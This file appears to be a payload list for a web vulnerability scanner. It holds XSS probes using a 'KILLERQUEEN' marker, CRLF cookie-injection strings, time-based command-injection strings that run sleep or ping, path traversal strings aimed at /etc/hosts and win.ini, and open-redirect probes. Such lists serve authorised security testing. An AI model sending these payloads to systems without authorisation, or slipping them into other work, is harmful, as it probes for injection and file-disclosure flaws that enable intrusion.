"KILLERQUEEN"
"'%22><KILLERQUEEN>"
"'>%22><script>alert(%22KILLERQUEEN%22)</script>"
"'"
"%22"
"%0d%0aSet-Cookie:xxxxtest%3Dxxxxtest%3B"
"../../../../../../../bin/sleep 20|"
";/bin/sleep 20"
"../../../../../../../windows/system32/ping -n 21 127.0.0.1|"
"&/windows/system32/ping -n 21 127.0.0.1"
"../../../../../../../../../etc/hosts"
"../../../../../../../../../etc/hosts%00"
"../../../../../../../../../windows/win.ini"
"../../../../../../../../../windows/win.ini%00"
"https://www.example.com/"
"//www.example.com/"
"@www.example.com/"
